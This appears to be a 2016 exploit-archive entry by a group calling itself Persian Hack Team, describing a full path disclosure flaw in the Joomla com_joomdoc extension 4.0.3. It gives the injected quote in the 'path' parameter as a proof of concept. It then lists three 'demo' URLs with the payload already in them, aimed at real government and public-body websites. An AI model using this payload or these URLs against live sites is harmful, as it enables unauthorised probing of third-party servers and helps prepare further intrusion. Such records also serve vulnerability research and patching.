######################
# Exploit Title :  Joomla com_joomdoc - Full Path Disclosure Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://extensions.joomla.org/extension/joomdoc
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version:  4.0.3
# Date: 2016/06/08
######################
# 
# PoC:
# Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. 
# index.php?option=com_joomdoc&view=documents&path=[']
# Demo :
# http://www.webster-ma.gov/index.php?option=com_joomdoc&view=documents&path=%27Agendas/Board+Of+Fire+Engineers&Itemid=735
# http://www.bpp.gov.ng/index.php?option=com_joomdoc&view=documents&path=%27Certificates+of+No+Objection+Jan-October+2013.pdf
# http://www.nursingcouncil.org.jm/index.php?option=com_joomdoc&view=documents&path=%27Application%20Forms&Itemid=62
######################
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################